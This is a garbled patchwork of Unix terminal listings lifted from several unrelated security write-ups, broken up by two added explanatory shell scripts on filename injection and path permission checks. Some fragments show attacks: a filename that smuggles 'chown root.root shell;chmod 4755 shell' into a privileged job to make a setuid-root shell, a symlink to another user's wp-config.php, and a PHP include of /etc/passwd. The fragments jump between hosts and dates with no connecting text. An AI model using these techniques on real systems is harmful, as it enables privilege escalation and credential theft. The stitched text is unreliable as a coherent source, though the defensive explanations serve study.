drwxr/xr/x
--------------------/Response/--------------------
[...]
<br>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
guest-dojMxl@vb-mint-12-x64 ~ $ whoami
guest-dojMxl
guest-dojMxl@vb-mint-12-x64 /home/jwalton $ cd /home/
guest-dojMxl@vb-mint-12-x64 /home $ ls -al
total 12
drwxr-xr-x 3 root root 4096 2012-05-05 16:29 .
drwxr-xr-x 23 root root 4096 2012-05-05 16:32 ..
drwxr-xr-x 5 jwalton jwalton 4096 2012-05-05 16:35 jwalton
guest-dojMxl@vb-mint-12-x64 ~ $ cd /home/jwalton/
guest-dojMxl@vb-mint-12-x64 /home/jwalton $ ls -al
total 28
mail.recon.cx
nobody@mail:~$ pwd
/
nobody@mail:~$ cd /home ; ls -l
total 36
drwxr-xr-x 3 cade cade 4096 Mar 6 2011 cade
drwxr-xr-x 17 hfortier hfortier 4096 Jan 18 18:21 hfortier
drwxr-xr-x 3 dma dma 4096 Feb 9 2011 dma
drwxr-xr-x 3 jamie jamie 4096 Jan 18 23:12 jamie
drwxr-xr-x 4 msf msf 4096 Aug 25 2010 msf
drwxr-xr-x 4 tina tina 4096 Jun 6 2011 tina
It turns out that he was showing how a root shell can be created:
[user1@testing574 tmp]$ ls -al
total 28
drwxrwxrwt 4 root root 4096 May 21 08:41 .
drwxr-xr-x 24 root root 4096 May 19 16:57 ..
-rw-rw-r-- 1 user1 user1 0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell;
drwx------ 2 root root 4096 May 21 08:41 backupPdUzR4
-rwsr-xr-x 1 root root 5056 May 21 08:41 shell
-rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c
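The listing above is the whole trick: the file named `;cd ..;chown root.root shell;chmod 4755 shell;` is empty, its name is the payload. A privileged job (presumably the backup job that created backupPdUzR4 at the same minute `shell` became setuid root) built a command line from filenames and handed it to a second shell, so the `;` in the name became command separators and the chown/chmod ran as root. The following is an added example, not code from the original post: it reproduces the injection without privileges (the injected command only creates a marker file; the backup loop, directory names and marker are assumed) next to the quoting that defeats it.

```sh
#!/bin/sh
# Added example, not code from the original post. Shows why a filename such as
# ";cd ..;chown root.root shell;chmod 4755 shell;" is dangerous to a script that
# re-parses filenames through a shell, and the quoting that fixes it.
# The backup loop, directory names and the INJECTED marker are assumed.
set -u

# Constructed sample: a directory holding a harmless file and one whose name
# is a shell command list. The injected command only creates a marker file.
setup_dir() {
    dir=$(mktemp -d)
    : > "$dir/notes.txt"
    : > "$dir/;touch INJECTED;"    # just a filename; nothing has run yet
    printf '%s\n' "$dir"
}

# Vulnerable pattern: the name is expanded unquoted into a string that is
# handed to a second shell, so ';' inside it becomes a command separator.
# Run from cron as root, the "touch" would be "chown root.root shell".
unsafe_backup() {
    src=$1; dst=$2
    ( cd "$src" && for f in *; do
          sh -c "cp $f $dst/" 2>/dev/null || :
      done )
}

# Hardened pattern: never re-parse. Pass the name as one quoted argument and
# put -- before it so a name beginning with '-' cannot become an option.
safe_backup() {
    src=$1; dst=$2
    ( cd "$src" && for f in *; do
          cp -- "$f" "$dst/"
      done )
}

# 0 if the injected command ran, i.e. the marker exists in the source dir.
was_injected() {
    [ -e "$1/INJECTED" ]
}
```

The same reasoning applies to `find -exec sh -c "... {}"`, `xargs` fed by unquoted `ls`, and `eval` over a directory listing: any place a name is turned back into shell syntax is a place an attacker who can create files chooses what root executes.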
Script started on Tue Dec 08 23:35:31 2009
### Starting with a clean directory
Don't Panic! # ls -al
total 6
drwxr-xr-x 2 root root 2 Dec 8 23:35 .
drwxrwxrwt 6 root sys 7 Dec 8 23:28 ..
### Untar the new SRR script
Don't Panic! # tar xf ../UNIX_51-15Dec2009.tar
dcarey@drewcarey.com [~/public_html]# ln -s /home/bbarker/public_html/wp-config.php vuln
dcarey@drewcarey.com [~/public_html]# ls -lsah
total 20K
4.0K drwxr-x--- 3 dcarey nobody 4.0K Feb 17 22:25 ./
4.0K drwxr-xr-x 9 dcarey dcarey 4.0K Feb 17 22:23 ../
4.0K drwxr-xr-x 2 dcarey dcarey 4.0K Feb 17 22:17 cgi-bin/
8.0K -rw-r--r-- 1 dcarey dcarey 4.1K Feb 10 18:16 default.html
0 lrwxrwxrwx 1 dcarey dcarey 39 Feb 17 22:25 vuln -> /home/bbarker/public_html/wp-config.php
However, when viewed via Apache our file is shown in full.
Running PHP 5.2.6 as an Apache module makes it possible to bypass many of its security restrictions. To understand the issue, we first need to know where the problem lies.
127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x 2 www www 512 Sep 10 03:49 .
drwxr-xr-x 4 www www 512 Sep 10 03:41 ..
-rw-r--r-- 1 www www 26 Sep 10 03:49 .htaccess
-rw-r--r-- 1 www www 33 Sep 10 03:49 not.php
-rw-r--r-- 1 www www 107 Sep 10 03:49 pufff.php
-rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
127# ls -la
total 8
drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
127# ps -aux -p 617
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
> $ mkdir foo
> $ cd foo
> $ echo hi > bar
> $ ls -la
> total 12
> drwxr-xr-x 2 user1 group1 4096 2009-10-27 16:22 ./
> drwx------ 57 user1 group1 4096 2009-10-27 16:22 ../
> -rw-r--r-- 1 user1 group1 3 2009-10-27 16:22 bar
> $ chmod 000 .
> $ echo bye > bar
> -bash: bar: Permission denied
# echo "safe" > /dir/file.txt
# chmod 0666 /dir/file.txt
# ls -al /dir
total 12
drwx------ 2 root root 4096 2009-10-29 00:28 .
drwxr-xr-x 27 root root 4096 2009-10-29 00:28 ..
-rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt
# cat /dir/file.txt
safe
Now user "nobody" cannot read or write this file:
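Both sessions above make the same point: whether a file can be opened is decided along the whole path, not by the file's own mode bits alone. Every directory on the way must grant search (x) permission to the caller's class, and only then do the file's r/w bits matter, so a 0666 file inside a 0700 directory is unreachable for `nobody`, and a `chmod 000 .` locks even the owner out of a file he could otherwise write. The script below is an added example, not from the original page; it simulates that access(2) walk from `stat` output for an arbitrary uid and gid list (DAC only, with the uid 0 override that CAP_DAC_OVERRIDE gives root), so the question "can user X reach this file?" can be answered without becoming X. It assumes GNU coreutils or BSD `stat` and absolute paths, and the paths and uids it is tried on are constructed.

```sh
#!/bin/sh
# Added example, not code from the original page. Simulates the DAC part of
# access(2) for an arbitrary uid and gid list: every directory on the path
# must grant search (x) to the caller's class before the file's own r/w bits
# count. uid 0 is treated as always allowed, as CAP_DAC_OVERRIDE does.
# Assumes GNU coreutils or BSD stat, an absolute path, and that the caller
# can stat every component (run it as root on a real system). uids are constructed.
set -u

# "mode owner-uid group-gid" for a path, mode in octal (GNU then BSD stat).
meta_of() {
    stat -c '%a %u %g' "$1" 2>/dev/null || stat -f '%Lp %u %g' "$1"
}

# Print the single octal digit (0-7) that applies to uid $2 with gids $3:
# the owner digit, else the group digit if any gid matches, else other.
perm_digit() {
    meta=$(meta_of "$1") || return 1
    set -- "$1" "$2" "$3" $meta            # $4=mode $5=owner $6=group
    m=$4; m=${m#"${m%???}"}               # keep the low three digits
    o=${m%??}; mid=${m#?}; g=${mid%?}; w=${m#??}
    if [ "$2" = "$5" ]; then printf '%s' "$o"; return; fi
    for gid in $3; do
        [ "$gid" = "$6" ] && { printf '%s' "$g"; return; }
    done
    printf '%s' "$w"
}

# can_access /abs/path uid "gid gid ..." r|w  -> 0 if allowed, 1 if denied.
can_access() {
    path=$1; uid=$2; gids=$3
    case $4 in r) bit=4 ;; w) bit=2 ;; *) return 2 ;; esac
    [ "$uid" = 0 ] && return 0
    # walk "/" and every directory prefix of the path, checking the x bit
    d=$(perm_digit / "$uid" "$gids") || return 1
    [ $((d & 1)) -eq 1 ] || return 1
    dir=""; rest=${path#/}
    while [ "$rest" != "${rest#*/}" ]; do
        dir="$dir/${rest%%/*}"; rest=${rest#*/}
        d=$(perm_digit "$dir" "$uid" "$gids") || return 1
        [ $((d & 1)) -eq 1 ] || return 1
    done
    # only now do the file's own bits matter
    d=$(perm_digit "$path" "$uid" "$gids") || return 1
    [ $((d & bit)) -ne 0 ]
}
```

The walk mirrors what the kernel does at each `namei` step, which is why a world-writable file under a 0700 directory is safe from `nobody` and why the `chmod 000 .` session fails at the directory, before the file's 0644 mode is ever consulted. ACLs, capabilities other than the root override, and mandatory access control are deliberately outside this simulation.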
Apache 2.2.4 and PHP 5.2.4. Let's look at the folder "/narkotyk" on localhost:82.
cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
-rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
-rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
-rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>